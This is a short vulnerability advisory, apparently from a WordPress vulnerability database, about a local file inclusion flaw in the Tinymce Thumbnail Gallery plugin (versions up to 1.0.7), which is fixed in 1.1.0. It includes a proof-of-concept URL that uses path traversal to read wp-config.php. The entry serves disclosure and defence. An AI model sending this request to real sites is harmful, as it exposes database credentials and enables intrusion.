Tinymce Thumbnail Gallery <= 1.0.7 - download-image.php Local File Inclusion



Proof of Concept
As seen in access logs:
http://www.example.com/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php

Affects Plugin

fixed in version 1.1.0

References

EXPLOITDB 19022
PACKETSTORM 113417
URL https://plugins.trac.wordpress.org/changeset/556394/tinymce-thumbnail-gallery

Classification

Type LFI
OWASP Top 10 A1: Injection
CWE CWE-22

Miscellaneous

Views 4930
Verified No
WPVDB ID 6219

Timeline

Publicly Published 2014-08-01 (over 5 years ago)
Added 2014-08-01 (over 5 years ago)
Last Updated 2019-11-01 (about 1 month ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin